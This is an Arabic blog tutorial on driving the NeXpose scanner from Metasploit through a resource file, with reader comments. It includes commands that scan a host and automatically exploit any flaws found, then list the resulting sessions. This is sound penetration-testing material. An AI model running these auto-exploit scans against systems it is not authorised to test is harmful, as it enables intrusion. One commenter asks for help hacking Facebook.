كيفية إستعمال NeXpose من داخل Metasploit لتنفيذ هجوم

نريد أن اقوم بعمل فحص على الشبكة من خلال NeXpose وفي حالة إكتشافه لثغرة قادر Metasploit على تنفيذها، أريده يقوم بإستغلالها … أذن لنبدأ معاً … أول شيء قم بإنشاء ملف في مجلد Metasploit مثلاً وسميه ما شئت (أنا سأستعمل الأسم NeXpose.rc):

vim NeXpose.rc

وضع فيه التالي:

db_create nexpose test.db
load nexpose
nexpose_connect nxadmin:[email protected]:3780
nexpose_scan -v -x -t pentest-audit 172.16.1.55

أغلق الملف وأحفظه … ولنوضح ما هي هذه السطور:
السطر الأول: قمنا بعملية إنشاء قاعدة بيانات لـ NeXpose …
السطر الثاني: قمنا بعملية تحميل NeXpose …
السطر الثالث: قمنا بعملية الإتصال على خادم NeXpose ووضعنا أسم المستخدم المراد إستعماله مع كلمة السر الخاصة به … في حالة كنت تستعمل NeXpose على خادم وتستعمل Metasploit من خادم آخر، قم بإسبتدال localhost بعنوان الـ IP الخاص بخادم NeXpose … أنا أستعمل خادم مركزي للامانة وأستعمل Metasploit من جهاز لاب توب قديم جداً ولا يتحمل أن يعمل عليه NeXpose ولهذا أستفيد من كونه عن بعد …
السطر الرابع: قمنا بتشغيل الفحص مع إختيار نوع الفحص والذي هنا هو pentest-audit وأيضاً أعطيناه الهدف المطلوب الفحص عليه، قم بإستبداله بما يناسبك … والخيار x هو لكي يقوم بتنفيذ أي إستغلال يكتشفه وقادر على إستغلاله بعد إنتهاء الفحص …

الآن لنقوم بالتنفيذ:

./msfconsole -r ./NeXpose.rc

ستظهر لك مثل هذا:

                                 _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|

       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 517 exploits - 245 auxiliary
+ -- --=[ 193 payloads - 23 encoders - 8 nops
       =[ svn r8531 updated today (2010.02.17)

resource (./NeXpose.rc)> db_create nexpose_test.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: nexpose_test.db
resource (./NeXpose.rc)> load nexpose

 ▄▄▄   ▄▄            ▄▄▄  ▄▄▄
 ███   ██             ██ ▄██
 ██▀█  ██   ▄████▄     ████    ██▄███▄    ▄████▄   ▄▄█████▄   ▄████▄
 ██ ██ ██  ██▄▄▄▄██     ██     ██▀  ▀██  ██▀  ▀██  ██▄▄▄▄ ▀  ██▄▄▄▄██
 ██  █▄██  ██▀▀▀▀▀▀    ████    ██    ██  ██    ██   ▀▀▀▀██▄  ██▀▀▀▀▀▀
 ██   ███  ▀██▄▄▄▄█   ██  ██   ███▄▄██▀  ▀██▄▄██▀  █▄▄▄▄▄██  ▀██▄▄▄▄█
 ▀▀   ▀▀▀    ▀▀▀▀▀   ▀▀▀  ▀▀▀  ██ ▀▀▀      ▀▀▀▀     ▀▀▀▀▀▀     ▀▀▀▀▀
                               ██

[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
resource (./NeXpose.rc)> nexpose_connect nxadmin:[email protected]:3780
[*] Connecting to NeXpose instance at localhost:3780 with username nxadmin...
resource (./NeXpose.rc)> nexpose_scan -v -t pentest-audit 172.16.1.55
[*] Creating a new scan using template pentest-audit and 32 concurrent IPs against 172.16.1.55
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Scanning 172.16.1.55-172.16.1.55...
[*]  >> Created temporary site #1
[*]  >> Created temporary report configuration #1
[*]  >> Scan has been launched with ID #1
[*]  >> Found 0 devices and 0 unresponsive
[*]  >> Found 1 devices and 0 unresponsive
[*]  >> Scan has been completed with ID #1
[*]  >> Waiting on the report to generate...
[*]  >> Downloading the report data from NeXpose...
[*]  >> Deleting the temporary site and report...
[*] Completed the scan of 1 addresses

الآن أنتهى الفحص لكي ترى النتائج، نفذ التالي:

msf > db_vulns

ستظهر لك قائمة بالنتائج حسب شبكتك والمشاكل التي عندك … وإذا كان قد تم إستغلال الجهاز من خلال ثغرة ما، فإنه يمكننا معرفة ذلك من خلال:

msf > sessions -l -v

أختر الـ Session الموجودة والباقي تعرفونه 🙂

نبذة عن الكاتب

علي ([email protected]). دكتوراة في أنظمة الحاسوب. يعمل كأستاذ جامعي في قسم علم الحاسوب. مختص في التحقيقات الجنائية الالكترونية والإستجابة للحوادث الالكترونية (DFIR)، أمن الشبكات وتحليلها، وكذلك أمن أنظمة التشغيل المختلفة. حاصل على العديد من الشهادات التقنية، وسابقاً كان يعمل كمختص في جدر النّار، أنظمة كشف الاختراق، ادارة الثغرات والترقيعات، حماية الأنظمة، فحصوصات الاختراق، وتطبيق السياسات. مسؤول سابق عن متابعة وتطبيق (PCI DSS).

التعليقات:

اترك تعليقاً | عدد التعليقات: (8)

  1. يقول m3tac0d3r:

    بارك الله في القائمين على هذا الصرح العظيم بإذنه

    معلومات قيمة ..

    جُزيت خيرًا

  2. يقول JaBrOt HaCkEr:

    السلام عليكم
    موضوع قوي قوي الصراحه
    يعطييك الف عافيه هذه المواضيع
    تقدم في مستوى الشخص
    بوركت
    في امان الله

  3. يقول Hacker-Unix:

    شكراً أخي ابومحمد لكن يوجد أداة autopwn أظنها تقوم بنفس مبدأ عمل neXpose فهي تجرب الاستغلالات بشكل اتوماتيكي (الرجاء التوضيح)

  4. يقول [email protected]:

    وعليكم السلام … حياكم الله يا شباب وإن شاء الله تستفيدوا من الموقع وما فيه …

     

    بخصوص كون autopwn تقوم بنفس الشيء، نعم أوافقك الرأي تقوم بذلك … لا اعرف إن كان هناك مزايا معينة … بحثت صراحة ولم أجد أجوبة … لعل الأفضل أن نقوم بتجربة ذلك 🙂

  5. يقول ViRuS_HiMa:

    جزاكم الله كل خير يا اخي بيناري علي الموضوع الرائع .

  6. يقول سعيد:

    اخوي يا ليت تقولي وش المشكله الي واجهتني وش حلها

    Checking for available jvms
    Validating jre in directory _jvm
    ./.DLLCACHE/nexserv: error while loading shared libraries: libstdc++.so.5: cannot open shared object file: No such file or directory
    Using jre at _jvm
    ./.DLLCACHE/nexserv: error while loading shared libraries: libstdc++.so.5: cannot open shared object file: No such file or directory
    Update merging failed: 127
    Checking for available jvms
    Validating jre in directory _jvm
    ./.DLLCACHE/nexserv: error while loading shared libraries: libstdc++.so.5: cannot open shared object file: No such file or directory
    Using jre at _jvm
    ./.DLLCACHE/nexserv: error while loading shared libraries: libstdc++.so.5: cannot open shared object file: No such file or directory
    NeXpose security console exited with code 127

  7. يقول wessim:

    كيفية استماله ميتاسبلويت هكر fb :/ nhebkom t3awnouni bech netaalim

أكتب تعليق على سعيد